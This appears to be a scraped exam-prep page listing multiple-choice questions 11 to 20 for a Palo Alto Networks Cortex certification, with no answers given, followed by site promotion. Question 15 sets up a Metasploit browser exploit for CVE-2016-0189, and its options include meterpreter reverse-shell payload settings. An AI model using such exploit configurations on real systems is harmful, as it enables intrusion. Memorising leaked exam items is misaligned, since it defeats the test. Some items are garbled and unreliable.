Exam Details

  • Exam Code
    :PSE-CORTEX
  • Exam Name
    :Palo Alto Networks System Engineer - Cortex Professional
  • Certification
    :PSE-Cortex Professional
  • Vendor
    :Palo Alto Networks
  • Total Questions
    :60 Q&As
  • Last Updated
    :May 15, 2024

Palo Alto Networks PSE-Cortex Professional PSE-CORTEX Questions & Answers

  • Question 11:

    Cortex XDR can schedule recurring scans of endpoints for malware. Identify two methods for initiating an on-demand malware scan (Choose two )

    A. Response > Action Center

    B. the local console

    C. Telnet

    D. Endpoint > Endpoint Management

  • Question 12:

    How many use cases should a POC success criteria document include?

    A. only 1

    B. 3 or more

    C. no more than 5

    D. no more than 2

  • Question 13:

    The certificate used for decryption was installed as a trusted root CA certificate to ensure communication between the Cortex XDR Agent and Cortex XDR Management Console What action needs to be taken if the administrator determines the Cortex XDR Agents are not communicating with the Cortex XDR Management Console?

    A. add paloaltonetworks com to the SSL Decryption Exclusion list

    B. enable SSL decryption

    C. disable SSL decryption

    D. reinstall the root CA certificate

  • Question 14:

    The images show two versions of the same automation script and the results they produce when executed in Demisto. What are two possible causes of the exception thrown in the second Image? (Choose two.)

    A. The modified scnpt was run in the wrong Docker image

    B. The modified script required a different parameter to run successfully.

    C. The dictionary was defined incorrectly in the second script.

    D. The modified script attempted to access a dictionary key that did not exist in the dictionary named "data"

  • Question 15:

    A test for a Microsoft exploit has been planned. After some research Internet Explorer 11 CVE-2016-0189 has been selected and a module in Metasploit has been identified (exploit/windows/browser/ms16_051_vbscript)

    The description and current configuration of the exploit are as follows;

    What is the remaining configuration?

    A. set PAYLOAD windows/x64/meterpreter/reverse_tcp set SSLCert survey set LHOST 10.0.0.10

    set LPORT 8080

    B. set PAYLOAD windows/x64/powershell_bind_tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

    C. set PAYLOAD windows/x64/meterpreter/reverse_Tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

    D. set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.10 set LPORT 443 set URIPATH survey

  • Question 16:

    In Cortex XDR Prevent, which three matching criteria can be used to dynamically group endpoints? (Choose three.)

    A. Domain/workgroup membership

    B. quarantine status

    C. hostname

    D. OS

    E. attack threat intelligence tag

  • Question 17:

    An EDR project was initiated by a CISO. Which resource will likely have the most heavy influence on the project?

    A. desktop engineer

    B. SOC manager

    C. SOC analyst IT

    D. operations manager

  • Question 18:

    How does an "inline" auto-extract task affect playbook execution?

    A. Doesn't wait until the indicators are enriched and continues executing the next step

    B. Doesn't wait until the indicators are enriched but populate context data before executing the next

    C. step. Wait until the indicators are enriched but doesn't populate context data before executing the next step.

    D. Wait until the indicators are enriched and populate context data before executing the next step.

  • Question 19:

    In the DBotScore context field, which context key would differentiate between multiple entries for the same indicator in a multi-TIP environment?

    A. Vendor

    B. Type

    C. Using

    D. Brand

  • Question 20:

    Which step is required to prepare the VDI Golden Image?

    A. Review any PE files that WildFire determined to be malicious

    B. Ensure the latest content updates are installed

    C. Run the VDI conversion tool

    D. Set the memory dumps to manual setting

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only Palo Alto Networks exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PSE-CORTEX exam preparations and Palo Alto Networks certification application, do not hesitate to visit our Vcedump.com to find your solutions here.